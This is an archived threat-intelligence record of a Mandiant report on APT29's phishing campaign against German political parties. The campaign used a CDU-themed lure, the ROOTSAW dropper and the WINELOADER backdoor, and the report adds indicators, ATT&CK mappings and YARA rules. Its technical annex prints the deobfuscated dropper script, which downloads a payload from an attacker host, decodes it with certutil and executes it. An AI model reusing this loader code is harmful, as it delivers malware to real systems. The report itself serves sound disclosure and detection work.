{ "id": "5c3e35fc-e6bf-40e1-9066-0a51d6654207", "created_at": "2026-04-06T00:21:22.278843Z", "updated_at": "2026-04-10T03:37:16.790912Z", "deleted_at": null, "sha1_hash": "2f73b0453f4e3e91ca9ff2e442c35985c76c50f5", "title": "APT29 Uses WINELOADER to Target German Political Parties", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 411858, "plain_text": "APT29 Uses WINELOADER to Target German Political Parties\r\nBy Mandiant\r\nPublished: 2024-03-22 · Archived: 2026-04-05 20:47:44 UTC\r\nWritten by: Luke Jenkins, Dan Black\r\nExecutive Summary\r\nIn late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German\r\npolitical parties with a CDU-themed lure.  \r\nThis is the first time we have seen this APT29 cluster target political parties, indicating a possible area of\r\nemerging operational focus beyond the typical targeting of diplomatic missions.\r\nBased on the SVR’s responsibility to collect political intelligence and this APT29 cluster’s historical\r\ntargeting patterns, we judge this activity to present a broad threat to European and other Western political\r\nparties from across the political spectrum.\r\nPlease see the Technical Annex for technical details and MITRE ATT\u0026CK techniques, (T1543.003, T1012,\r\nT1082, T1134, T1057, T1007, T1027, T1070.004, T1055.003 and T1083)\r\nThreat Detail\r\nIn late February 2024, Mandiant identified APT29 — a Russian Federation backed threat group linked by multiple\r\ngovernments to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting\r\nGerman political parties. Consistent with APT29 operations extending back to 2021, this operation leveraged\r\nAPT29’s mainstay first-stage payload ROOTSAW (aka EnvyScout) to deliver a new backdoor variant publicly\r\ntracked as WINELOADER. \r\nNotably, this activity represents a departure from this APT29 initial access cluster’s typical remit of targeting\r\ngovernments, foreign embassies, and other diplomatic missions, and is the first time Mandiant has seen an\r\noperational interest in political parties from this APT29 subcluster. Additionally, while APT29 has\r\npreviously used lure documents bearing the logo of German government organizations, this is the first instance\r\nwhere we have seen the group use German-language lure content — a possible artifact of the targeting differences\r\n(i.e. domestic vs. foreign) between the two operations. \r\nPhishing emails were sent to victims purporting to be an invite to a dinner reception on 01 March bearing a\r\nlogo from the Christian Democratic Union (CDU), a major political party in Germany (see Figure 1). \r\nThe German-language lure document contains a phishing link directing victims to a malicious ZIP file\r\ncontaining a ROOTSAW dropper hosted on an actor-controlled compromised website\r\n“https://waterforvoiceless[.]org/invite.php”. \r\nROOTSAW delivered a second-stage CDU-themed lure document and a next\r\nstage WINELOADER payload retrieved from “waterforvoiceless[.]org/util.php”. \r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 1 of 8\n\nWINELOADER was first observed in operational use in late January 2024 in an operation targeting\r\nlikely diplomatic entities in Czechia, Germany, India, Italy, Latvia, and Peru. \r\nThe backdoor contains several features and functions that overlap with several known APT29\r\nmalware families including BURNTBATTER, MUSKYBEAT and BEATDROP, indicating they are\r\nlikely created by a common developer (see Technical Annex for additional details).\r\nFigure 1: Lure document redirecting victims to an APT29 controlled compromised WordPress website hosting\r\nROOTSAW\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 2 of 8\n\nFigure 2: Second CDU lure displayed by ROOTSAW downloader\r\nOutlook \u0026 Implications\r\nROOTSAW continues to be the central component of APT29’s initial access efforts to collect foreign political\r\nintelligence. The first-stage malware’s expanded use to target German political parties is a noted departure from\r\nthe typical diplomatic focus of this APT29 subcluster, and almost certainly reflects the SVR’s interest in gleaning\r\ninformation from political parties and other aspects of civil society that could advance Moscow’s geopolitical\r\ninterests. \r\nAs highlighted in our previous research detailing APT29’s operations in the first-half of 2023, these malware\r\ndelivery operations are highly adaptive, and continue to evolve in lockstep with Russia’s geopolitical realities. We\r\ntherefore suspect that APT29’s interest in  these organizations is unlikely to be limited to Germany. Western\r\npolitical parties and their associated bodies from across the political spectrum are likely also possible targets for\r\nfuture SVR-linked cyber espionage activity given Moscow’s vital interest in understanding changing Western\r\npolitical dynamics related to Ukraine and other flashpoint foreign policy issues. \r\nBased on recent activity from other APT29 subclusters, attempts to achieve initial access beyond phishing may\r\ninclude attempts to subvert cloud-based authentication mechanisms or brute force methods such as password\r\nspraying. For more details regarding APT29’s recent tactics, please see the February 2024 advisory from the\r\nUnited Kingdom’s National Cyber Security Center (NCSC).\r\nTechnical Annex\r\nInitial Access\r\nStarting as early as 26 February 2024, APT29 distributed phishing attachments containing links to an actor-controlled compromise website, “waterforvoiceless[.]org/invite.php”, to redirect victims to a ROOTSAW dropper.\r\nThis ROOTSAW variant uses the same JavaScript obfuscation resource used in previous APT29 operations, and\r\nultimately results in a request to download and execute the second stage WINELOADER from the same server at \r\n“waterforvoiceless[.]org/util.php”. \r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 3 of 8\n\nThe ROOTSAW payload contains a  JSObfuscated payload, that when parsed, results in the following code that is\r\nresponsible for downloading a file to disk as “invite.txt”, decoding it using Windows Certutil, then decompressing\r\nthe code using tar. Finally, the legitimate Windows binary (SqlDumper.exe) is executed by the actor.\r\nvar a = new ActiveXObject(\"Wscript.Shell\");\r\nfunction Ijdaskjw(_0x559297) {\r\n var _0x3bd487 = new XMLHttpRequest();\r\n _0x3bd487.onreadystatechange = function () {\r\n if (_0x3bd487.readyState == 0x4 \u0026\u0026 _0x3bd487.status == 0xc8) {\r\n var _0x11aa10 = _0x3bd487.response;\r\n var _0xce698d = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var _0x20081c = _0xce698d.OpenTextFile(\"C:\\\\Windows\\\\Tasks\r\n\\\\invite.txt\", 0x2, true, 0x0);\r\n _0x20081c.Write(_0x11aa10);\r\n _0x20081c.close();\r\n a.Run(\"certutil -decode C:\\\\Windows\\\\Tasks\\\\invite.txt C:\\\\Windows\r\n\\\\Tasks\\\\invite.zip\", 0x0);\r\n var _0x245d53 = Date.now();\r\n var _0x3f9f72 = null;\r\n do {\r\n _0x3f9f72 = Date.now();\r\n } while (_0x3f9f72 - _0x245d53 \u003c 0xbb8);\r\n a.Run(\"tar -xf C:\\\\Windows\\\\Tasks\\\\invite.zip -C C:\\\\Windows\\\\Tasks\r\n\\\\ \", 0x0);\r\n var _0x245d53 = Date.now();\r\n var _0x3f9f72 = null;\r\n do {\r\n _0x3f9f72 = Date.now();\r\n } while (_0x3f9f72 - _0x245d53 \u003c 0xdac);\r\n a.Run(\"C:\\\\Windows\\\\Tasks\\\\SqlDumper.exe\", 0x0);\r\n }\r\n };\r\n _0x3bd487.open(\"GET\", _0x559297, true);\r\n _0x3bd487.send(null);\r\n}\r\nIjdaskjw(\"https://waterforvoiceless.org/util.php\");\r\nInvite.pdf (MD5: fb6323c19d3399ba94ecd391f7e35a9c)\r\nSecond CDU-themed PDF lure document\r\nWritten in LibreOffice 6.4 by default user “Writer”\r\nMetadata documents the PDF as en-GB language\r\nLinks to https://waterforvoiceless[.]org/invite.php\r\ninvite.php (MD5: 7a465344a58a6c67d5a733a815ef4cb7)\r\nZip file containing ROOTSAW\r\nDownloaded from https://waterforvoiceless[.]org/invite.php\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 4 of 8\n\nExecutes efafcd00b9157b4146506bd381326f39\r\ninvite.hta (MD5: efafcd00b9157b4146506bd381326f39)\r\nROOTSAW downloader containing obfuscated code\r\nDownloads from https://waterforvoiceless[.]org/util.php\r\nExtracts 44ce4b785d1795b71cee9f77db6ffe1b\r\nExecutes f32c04ad97fa25752f9488781853f0ea\r\ninvite.txt (MD5: 44ce4b785d1795b71cee9f77db6ffe1b)\r\nMalicious certificate file, extracted using Windows Certutil\r\nExecuted from efafcd00b9157b4146506bd381326f39\r\nDownloaded from https://waterforvoiceless[.]org/util.php\r\ninvite.zip (MD5: 5928907c41368d6e87dc3e4e4be30e42)\r\nMalicious zip containing WINELOADER\r\nExtracted from 44ce4b785d1795b71cee9f77db6ffe1b\r\nContains e017bfc36e387e8c3e7a338782805dde\r\nContains f32c04ad97fa25752f9488781853f0ea\r\nsqldumper.exe (MD5: f32c04ad97fa25752f9488781853f0ea)\r\nLegitimate Microsoft file Sqldumper used for side loading\r\nAnalysis of WINELOADER\r\nWINELOADER is likely a variant of the non-public historic BURNTBATTER and MUSKYBEAT code families\r\nwhich Mandiant uniquely associates with APT29. It shares a similar design and pattern, specifically around the\r\ninvocation of the malware and the anti-analysis techniques used. However, the code family itself is considerably\r\nmore customized than the previous variants, as it no longer uses publicly available loaders like DONUT or\r\nDAVESHELL and implements a unique C2 mechanism. Additionally, WINELOADER contains the following\r\nshared techniques with other code families used by APT29:\r\nThe RC4 algorithm used to decrypt the next stage payload;\r\nProcess/DLL name check to validate the payload context (in use since early BEATDROP variants);\r\nNtdll usermode hook bypass (in use since early BEATDROP variants).\r\nWINELOADER is invoked via a DLL side loading technique into a legitimate Windows executable and starts to\r\ndecrypt the main implant logic itself using RC4. This first layer of deobfuscation was first witnessed in the\r\nMUSKYBEAT/BURNTBATTER malware families and was originally used to decrypt a second file also stored in\r\nthe zip file. Within WINELOADER, it is used to decrypt a region of memory containing the actual\r\nWINELOADER module. This module is a compiled position independent shellcode which contains references\r\nwithin itself to strings and decryption modules. \r\nThe decryption function then moves execution to this position independent shellcode. ZScaler refers to this\r\nresource as the WINELOADER core module, and notes that it contains settings (C2 information, RC4 decryption\r\nkeys) and strings. Based on samples identified by Mandiant, the WINELOADER resource contains 70 encrypted\r\nstrings and both samples have the default sleep timer of 2 seconds configured.\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 5 of 8\n\nWINELOADER communicates using HTTP GET requests using a user agent contained within the resource. Each\r\npacket to the C2 server contains a random size registration packet, this packet contains environment information\r\nlike the victim’s username/device name, the process name and some information that could be used by the actor to\r\ndetermine whether the compromised system is a valid target (parent process path, etc.). The response from the C2\r\nserver can task the WINELOADER to execute a new module (either within the same process, or via process\r\ninjection) and to update the sleep timer. \r\nAlthough Mandiant was unable to obtain commands from the actor, ZScaler reported that they were able to\r\nreceive a command to persist WINELOADER which resulted in a run key to be configured on the device. \r\nvcruntime140.dll (MD5: 8bd528d2b828c9289d9063eba2dc6aa0)\r\nWINELOADER downloader\r\nCommunicates to https://siestakeying[.]com/auth.php\r\nVcruntime140.dll (MD5: e017bfc36e387e8c3e7a338782805dde)\r\nWINELOADER downloader \r\nCommunicates to https://siestakeying[.]com/auth.php\r\nMITRE ATT\u0026CK Techniques\r\nID Technique\r\nT1543.003 Windows Service\r\nT1012 Query Registry\r\nT1082 System Information Discovery\r\nT1134 Access Token Manipulation\r\nT1057 Process Discovery\r\nT1007 System Service Discovery\r\nT1027 Obfuscated Files or Information\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 6 of 8\n\nT1070.004 File Deletion\r\nT1055.003 Thread Execution Hijacking\r\nT1083 File and Directory Discovery\r\nDetections\r\nrule M_APT_Dropper_Rootsaw_Obfuscated\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is meant for hunting\r\nand is not tested to run in a production environment.\"\r\n description = \"Detects obfuscated ROOTSAW payloads\"\r\n strings:\r\n $ = \"function _\"\r\n $ = \"new XMLHttpRequest();\"\r\n $ = \"'\\\\x2e\\\\x7a\\\\x69\\\\x70'\"\r\n $ = \"'\\\\x4f\\\\x70\\\\x65\\\\x6e'\"\r\n $ = \"\\\\x43\\\\x3a\\\\x5c\\\\x57\"\r\n condition:\r\n all of them\r\n}\r\nrule M_APT_Downloader_WINELOADER_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is meant for hunting and\r\nis not tested to run in a production environment.\"\r\n description = \"Detects rc4 decryption logic in\r\nWINELOADER samples\"\r\n strings:\r\n $ = {B9 00 01 00 00 99 F7 F9 8B 44 24 [50-200]\r\n0F B6 00 3D FF 00 00 00} // Key initialization\r\n $ = {0F B6 00 3D FF 00 00 00} // Key size\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 7 of 8\n\ncondition:\r\n all of them\r\n}\r\nrule M_APT_Downloader_WINELOADER_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is meant for hunting and\r\nis not tested to run in a production environment.\"\r\n description = \"Detects payload invocation stub\r\nin WINELOADER\"\r\n strings:\r\n // 48 8D 0D ?? ?? 00 00 lea rcx, module_start\r\n(Pointer to encrypted resource)\r\n // 48 C7 C2 ?? ?? 00 00 mov rdx, ???? (size of encrypted source)\r\n // E8 [4] call decryption\r\n // 48 8D 05 [4] lea rcx, ??\r\n // 48 8D 0D [4] lea rax, module_start (decrypted resource)\r\n // 48 89 05 [4] mov ptr_mod, rax\r\n //\r\n $ = {48 8D 0D ?? ?? 00 00 48 C7 C2 ?? ?? 00 00 E8 [4]\r\n48 8d 0D [4] 48 8D 05 [4] 48 89 05 }\r\n condition:\r\n all of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 8 of 8\n\nWINELOADER samples\" strings: \n$ = {B9 00 01 00 00 99 F7 F9 8B 44 24 [50-200]\n0F B6 00 3D FF 00 00 00} // Key initialization \n$ = {0F B6 00 3D FF 00 00 00} // Key size\n Page 7 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties" ], "report_names": [ "apt29-wineloader-german-political-parties" ], "threat_actors": [ { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434882, "ts_updated_at": 1775792236, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2f73b0453f4e3e91ca9ff2e442c35985c76c50f5.pdf", "text": "https://archive.orkl.eu/2f73b0453f4e3e91ca9ff2e442c35985c76c50f5.txt", "img": "https://archive.orkl.eu/2f73b0453f4e3e91ca9ff2e442c35985c76c50f5.jpg" } }